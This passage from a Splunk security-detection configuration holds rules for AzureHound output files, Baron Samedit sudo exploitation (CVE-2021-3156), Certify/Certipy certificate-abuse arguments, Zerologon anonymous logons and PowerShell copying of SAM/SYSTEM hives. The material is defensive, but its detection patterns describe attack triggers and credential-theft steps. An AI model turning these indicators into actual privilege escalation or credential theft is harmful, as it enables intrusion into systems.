Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on file modifications that include the name of the process, and file, responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = False positives should be limited as the analytic is specific to a filename with extension .zip. Filter as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AzureHound File Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to disk that is related to AzureHound, a AzureAD enumeration utility, has occurred on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AzureHound File Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. 
action.notable.param.rule_title = Detect AzureHound File Modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*-azurecollection.zip", "*-azprivroleadminrights.json", "*-azglobaladminrights.json", "*-azcloudappadmins.json", "*-azapplicationadmins.json") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. 
The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. 
Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.escu.how_to_implement = Splunk Universal Forwarder running on Linux systems, capturing logs from the /var/log directory. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-27 action.escu.modification_date = 2021-01-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as 
Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `linux_hosts` "sudoedit -s \\" | `detect_baron_samedit_cve_2021_3156_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 Segfault - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. 
If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. action.escu.how_to_implement = Splunk Universal Forwarder running on Linux systems (tested on Centos and Ubuntu), where segfaults are being logged. This also captures instances where the exploit has been compiled into a binary. The detection looks for greater than 5 instances of sudoedit combined with segfault over your search time period on a single host action.escu.known_false_positives = If sudoedit is throwing segfaults for other reasons this will pick those up too. 
action.escu.creation_date = 2021-01-29 action.escu.modification_date = 2021-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 Segfault - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 Segfault - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. 
action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 Segfault action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `linux_hosts` TERM(sudoedit) TERM(segfault) | stats count min(_time) as firstTime max(_time) as lastTime by host | where count > 5 | `detect_baron_samedit_cve_2021_3156_segfault_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the heap-based buffer overflow for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. 
False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the heap-based buffer overflow for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. 
Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. action.escu.how_to_implement = OSQuery installed and configured to pick up process events (info at https://osquery.io) as well as using the Splunk OSQuery Add-on https://splunkbase.splunk.com/app/4402. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-28 action.escu.modification_date = 2021-01-28 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 via OSQuery - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the heap-based buffer overflow 
for the sudoedit command and identifies instances where the command "sudoedit -s *" is run using the osquery_process data source. This indicates that the sudoedit command is used with the "-s" flag, which is associated with the heap-based buffer overflow vulnerability. The detection is important because it indicates a potential security vulnerability, specifically Baron Samedit CVE-2021-3156, which helps to identify and respond to potential heap-based buffer overflow attacks to enhance the security posture of the organization. This vulnerability allows an attacker to escalate privileges and potentially gain unauthorized access to the system. If the attack is successful, the attacker can gain full control of the system, run arbitrary code, or access sensitive data. Such attacks can lead to data breaches, unauthorized access, and potential disruption of critical systems. False positives might occur since the legitimate use of the sudoedit command with the "-s" flag can also trigger this detection. You must carefully review and validate the findings before taking any action. Next steps include investigating all true positive detections promptly, reviewing the associated processes, gather relevant artifacts, identifying the source of the attack to contain the threat, mitigate the risks, and prevent further damage to the environment. 
action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 via OSQuery action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `osquery_process` | search "columns.cmdline"="sudoedit -s \\*" | `detect_baron_samedit_cve_2021_3156_via_osquery_filter` [ESCU - Detect Certify Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Command and Control"], "mitre_attack": ["T1649", "T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. 
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-06-25 action.escu.modification_date = 2023-06-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Certify Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Certificate Services", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = Certify/Certipy arguments detected on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"threat_object_field": "process_name", "threat_object_type": "process"}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Certify Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation", "Command and Control"], "mitre_attack": ["T1649", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies when the attacker tool Certify or Certipy are used to enumerate Active Directory Certificate Services (AD CS) environments. 
The default command line arguments of these tools are similar and perform near identical enumeration or exploitation functions. action.notable.param.rule_title = Detect Certify Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("* find *","* auth *","* request *","* req *","* download *",) AND Processes.process IN ("* /vulnerable*","* /enrolleeSuppliesSubject *","* /json /outfile*","* /ca*", "* -username *","* -u *") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `detect_certify_command_line_arguments_filter` [ESCU - Detect Certify With PowerShell Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tools are similar to PowerShell calls and perform near identical enumeration or exploitation functions. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1649", "T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tool are similar to the PowerShell calls and perform near-identical enumeration or exploitation functions.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Unknown, partial script block matches.
action.escu.creation_date = 2023-06-25
action.escu.modification_date = 2023-06-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Certify With PowerShell Script Block Logging - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Windows Certificate Services", "Malicious PowerShell"]
action.risk = 1
action.risk.param._risk_message = Certify arguments through PowerShell detected on $dest$.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Certify With PowerShell Script Block Logging - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1649", "T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies when the attacker tool Certify is used through an in-memory PowerShell function to enumerate Active Directory Certificate Services (AD CS) environments. The default command line arguments for the binary version of this tool are similar to the PowerShell calls and perform near-identical enumeration or exploitation functions.
action.notable.param.rule_title = Detect Certify With PowerShell Script Block Logging
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText IN ("*find *") AND ScriptBlockText IN ("* /vulnerable*","* -vulnerable*","* /enrolleeSuppliesSubject *","* /json /outfile*")) OR (ScriptBlockText IN ("*auth *","*req *") AND ScriptBlockText IN ("* -ca *","* -username *","* -u *")) OR (ScriptBlockText IN ("*request *","*download *") AND ScriptBlockText IN ("* /ca:*")) | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(OpCode) as reason values(Path) as file_name values(UserID) as user by _time Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval file_name = case(isnotnull(file_name),file_name,true(),"unknown") | eval signature = substr(command,0,256) | rename Computer as dest,EventCode as signature_id | `detect_certify_with_powershell_script_block_logging_filter`

[ESCU - Detect Certipy File Modifications - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. The default behavior of this toolkit drops a number of uniquely named files or file extensions related to its information gathering and exfiltration process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649", "T1560"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. \
The default behavior of this toolkit drops a number of uniquely named files or file extensions related to its information gathering and exfiltration process.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints as well as file creation or deletion events.
action.escu.known_false_positives = Unknown
action.escu.creation_date = 2023-06-25
action.escu.modification_date = 2023-06-25
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Certipy File Modifications - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Certificate Services", "Data Exfiltration", "Ingress Tool Transfer"]
action.risk = 1
action.risk.param._risk_message = Suspicious files $file_name$ related to Certipy detected on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Certipy File Modifications - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Certificate Services", "Data Exfiltration", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1649", "T1560"], \
"nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies when the attacker tool Certipy is used to enumerate Active Directory Certificate Services (AD CS) environments. The default behavior of this toolkit drops a number of uniquely named files or file extensions related to its information gathering and exfiltration process.
action.notable.param.rule_title = Detect Certipy File Modifications
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime values(Processes.process_current_directory) as process_current_directory FROM datamodel=Endpoint.Processes where Processes.action="allowed" BY _time span=1h Processes.user Processes.dest Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.parent_process_name Processes.parent_process Processes.process_guid Processes.action | `drop_dm_object_name(Processes)` | join max=0 dest process_guid [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*_certipy.zip", "*_certipy.txt", "*_certipy.json", "*.ccache") by Filesystem.file_create_time Filesystem.process_id Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` ] | fields firstTime lastTime user dest file_create_time file_name file_path parent_process_name parent_process process_name process_path process_current_directory process process_guid process_id | where isnotnull(file_name) | `security_content_ctime(firstTime)` | \
`security_content_ctime(lastTime)` | `detect_certipy_file_modifications_filter`

[ESCU - Detect Computer Changed with Anonymous Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for Event Code 4742 (Computer Change) or Event Code 4624 (An account was successfully logged on) with an anonymous account.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search looks for Event Code 4742 (Computer Change) or Event Code 4624 (An account was successfully logged on) with an anonymous account.
action.escu.how_to_implement = This search requires audit computer account management to be enabled on the system in order to generate Event ID 4742. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Event Logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.
action.escu.known_false_positives = None thus far found
action.escu.creation_date = 2020-09-18
action.escu.modification_date = 2020-09-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Computer Changed with Anonymous Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Detect Zerologon Attack"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Detect Computer Changed with Anonymous Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Detect Zerologon Attack"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2020-1472"], "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1210"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` (EventCode=4624 OR EventCode=4742) TargetUserName="ANONYMOUS LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName) as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter`

[ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in the script block. This will catch the most basic use cases for credentials being taken for offline cracking. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = []
